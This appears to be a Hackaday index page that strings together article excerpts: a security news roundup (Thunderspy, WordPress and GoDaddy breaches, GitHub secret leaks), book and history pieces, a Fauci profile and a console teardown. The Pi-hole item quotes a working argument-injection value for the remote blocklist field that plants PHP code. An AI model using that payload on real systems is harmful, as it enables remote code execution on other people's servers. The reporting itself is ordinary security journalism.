This excellent content from the Hackaday writing crew highlights recurring topics and popular series like Linux-Fu, 3D-Printering, Hackaday Links, This Week in Security, Inputs of Interest, Profiles in Science, Retrotechtacular, Ask Hackaday, Teardowns, Reviews, and many more.
Hackaday editors Mike Szczys and Elliot Williams explore the coolest hacks of the past 168 hours. The big news this week: will Wink customers pony up $5 a month to turn their lights on and off? There’s a new open source design for a pick and place machine. You may not have a Vectrex gaming console, but there’s a scratch-built board that can turn you oscilloscope into one. And you just can’t miss this LED sign technology that programs every pixel using projection mapping.
Take a look at the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!
Thunderspy was announced this week, developed by [Björn Ruytenberg]. A series of attacks on the Thunderbolt 3 protocol, Thunderspy is the next vulnerability in the style of Inception, PCILeech, and Thunderclap.
Inception and PCILeech were attacks on the naive Direct Memory Access (DMA) built into Firewire, Thunderbolt 1, and PCIe. A device could connect and request DMA over the link. Once granted, it could access the bottom four gigabytes of system memory, with both read and write access. It’s not hard to imagine how that would be a huge security problem, and it seems that this technique was in use by intelligence agencies at the time it was discovered. As an aside, the hardware DMA was entirely independent of software, so it was possible to debug a crashed kernel over firewire.
Once the vulnerability was made public, hardware and software vendors have taken steps to harden their systems against the attack. Thunderbolt 2 introduced security levels as a mitigation against the attacks. A user has to mark a device as trusted before DMA is offered to that device. Thunderclap exploited a series of vulnerabilities in how individual OSes interacted with those hardware mitigations.
Image by Björn Ruytenberg. Licensed under CC BY 4.0.
Now, Thunderspy abuses a series of problems in Intel’s Thunderbolt 3 specification and implementation. One interesting attack is cloning an already trusted Thunderbolt device. Plugging a Thunderbolt device into a Linux machine easily captures the device UUID. A malicious Thunderbolt device can be given that same UUID, and suddenly has the same level of trust as the cloned device.
[Björn] took the attack a step further, and discovered that he could disassemble a laptop or thunderbolt device, and read the firmware directly off the thunderbolt controller. That firmware can be modified and re-uploaded. One of the simplest attacks that enables is turning the security level to its lowest setting.
It’s interesting research, and there are fixes coming or already in place to mitigate the problems found. The real question is how much Thunderspy matters. The threat model is the evil maid: A laptop left in a motel room would be available to the cleaning staff for a few minutes. Thunderspy could potentially be used for this style of attack, but there are many other potentially better attack options. There is a narrow circumstance where Thunderspy is the perfect technique: A device with an encrypted drive, that’s been powered on and logged into, but locked. In this case, Thunderspy could be used to recover the drive encryption key stored in memory, and then used to plant malware.
That Time When Facebook Broke Everything
You may have noticed some widespread iOS application misbehavior on the 6th. Facebook introduced a change to the server component to their sign-on SDK, which caused many apps that made use of that SDK to crash. It’s worth asking if it’s a good idea for so many popular apps to use Facebook code. There doesn’t appear to have been a vulnerability or path to compromise other than the denial of service.
Large-scale WordPress attack
Nearly a million WordPress sites are under attack, in a campaign targeting a variety of vulnerabilities. The general attack strategy is to inject a malicious javscript that lays dormant until it’s executed by a site administrator. Ironically, logging in to your site to check it for compromise could be the trigger that leads to compromise. As always, keep your plugins up to date and follow the rest of the best practices.
Godaddy Breaches
Godaddy users were recently informed that there was a breach that exposed portions of their accounts to compromise. Notably, the compromise happened back in October of 2019, and wasn’t discovered for 6 months. Godaddy has stated that there wasn’t any evidence of any malicious action beyond the initial compromise, which is puzzling in itself.
On April 23, 2020, we identified SSH usernames and passwords had been compromised through an altered SSH file in our hosting environment. This affected approximately 28,000 customers. We immediately reset these usernames and passwords, removed the offending SSH file from our platform, and have no indication the threat actor used our customers’ credentials or modified any customer hosting accounts. To be clear, the threat actor did not have access to customers’ main GoDaddy accounts.
Pi-hole Exploit
A fun RCE exploit was discovered in the Pi-hole software. This particular problem requires authenticated access to the Pi-hole administrative web interface, so it’s not likely to cause too many problems on its own. Exploiting the flaw is simple, just set http://192.168.122.1#" -o fun.php -d " as the remote blocklist, with an IP that you control. Under the hood, the remote blocklist is fetched via curl, and the URL isn’t properly sanitized. Your PHP code is saved in the web directory, and an HTTP request triggers that code.
Leaking on Github
[Tillson Galloway] tells the story of how he made $10,000 in bug bounties, simply by searching Github for passwords and keys that shouldn’t be there. By searching for specific keywords, he found all sorts of interesting, unintentional things. vim_settings.xml contains recently copied and pasted strings, and .bash_history contains a record of commands that have been run. How many times have you accidentally typed a password in on the command line, thinking you were authenticating with SSH or sudo, just for an example? It’s an easy mistake to make, to accidentally include one of these hidden files in a public repository.
There have been examples of API keys accidentally included in source code drops, and even SSL certificates leaked this way over the years. It’s a lesson to all of us, make sure to sanitize projects before pushing code to Github.
For many of us, our passion for electronics and science originated with curiosity about some device, a computer, radio, or even a car. The subject of this book has just such an origin. However, how many of us made this discovery and pursued this path during times of hunger or outright famine?
That’s the remarkable story of William Kamkwamba that’s told in the book, The Boy Who Harnessed the Wind. Remarkable because it culminates with his building a windmill (more correctly called a wind turbine) that powered lights in his family’s house all by the young age of fifteen. As you’ll see, it’s also the story of an unyielding thirst for knowledge in the face of famine and doubt by others.
I am a fan of the saying that those who don’t know history are doomed to repeat it. After all, humans have been building things for a number of centuries and we should learn from the engineers of the past. While you can learn a lot studying successes, sometimes — maybe even most of the time — we learn more from studying failure. The US Navy’s Mark 14 torpedo certainly has a lot to teach us.
The start of the story was the WWI-era Mark 10 torpedo which was fine for its day, but with faster destroyers and some additional data about how to best sink enemy ships it seemed necessary to build a new torpedo that would be faster, carry more explosive charge, and use a new method of detonation. Work started in 1931 with a $143,000 budget which may sound laughable today, but that was a lot of coin in the 1930s. Adjusted for inflation, that’s about $2.5 million.
In the two months since the harsh realities of SARS-CoV-2 and COVID-19 have come into sharp focus, Americans have become increasingly familiar with a man who has been quietly serving the people since the days when Ronald Reagan was up for re-election. For many, Dr. Anthony Fauci is the national voice of reason in a sea of dubious information. He has arguably become the most trustworthy person the government has to offer in the face of this pandemic.
Officially, Dr. Fauci is the Director of the National Institute of Allergy and Infectious Diseases (NIAID), a position he was appointed to in 1984. He has worked under six presidents, advising them on every outbreak from the HIV/AIDS epidemic up through Zika and Ebola. Now, he is part of the White House’s coronavirus task force.
At 79 years old, he still works 18-hour days, sticking it to infectious diseases with one hand, and smoothing the feathers of the American people with the other. Dr. Fauci certainly feels like the right person at the right time. So how did he get to this point?
There are many ways in which one’s youth can be misspent, most of which people wish they’d done when they get older and look back on their own relatively boring formative years. I misspent my youth pulling TV sets out of dumpsters and fixing them or using their parts in my projects. I recognise with hindsight that there might have been a few things I could have done with more street cred, but for me, it was broken TVs. Continue reading “Understanding A Bit About Noise Can Help You Go A Long Way”→
Today if you wanted a little gadget to sit on your shelf and let you play classic games from the early console era, you’d likely reach for the Raspberry Pi. With slick emulator front-ends like RetroPie and DIY kits available on Amazon, you don’t even need to be a technical wizard or veteran penguin wrangler to set it up. If you can follow an online tutorial, you can easily cram the last few decades of gaming into a cheap and convenient package.
But things were a bit different back in 2005. There weren’t a lot of options for playing old games on the big screen, and what was out there tended to be less than ideal. You could hack an original Xbox or gut an old laptop to make an emulation box that could comfortably blend in with your DVD player, but that wasn’t exactly in everyone’s wheelhouse. Besides, what if you had the original cartridges and just wanted to play them on a slightly more modern system?
I’m willing to bet whoever wrote this owns a katana.
Enter Messiah, and their Generation NEX console. As you might have gathered from their ever-so-humble name, Messiah claimed their re-imagined version of the Nintendo Entertainment System would “Bring Gaming Back to Life” by playing the original cartridges with enhanced audio and visual clarity. It also featured integrated support for wireless controllers, which at the time was only just becoming the standard on contemporary consoles. According to the manufacturer, the Generation NEX used custom hardware based on the “NES algorithm” that offered nearly 100% game compatibility.
Unfortunately, the system was a complete bomb. Despite Messiah’s claims, the Generation NEX ended up being yet another “NES-on-a-chip” (NOAC) clone, and a pretty poor one at that. Reviewers at the time reported compatibility issues with many popular titles, despite the fact that they were listed as working on Messiah’s website. The touted audio and video improvements were nowhere to be found, and in fact many users claimed the original NES looked and sounded better in side-by-side comparisons.
It didn’t matter how slick the console looked or how convenient the wireless controllers were; if the games themselves didn’t play well, the system was doomed. Predictably the company folded not long after, leaving owners stuck with the over-priced and under-performing consoles. Realistically, most of them ended up in landfills. Today we’ll take a look inside a relatively rare survivor and see just what nostalgic gamers got for their money in 2005.
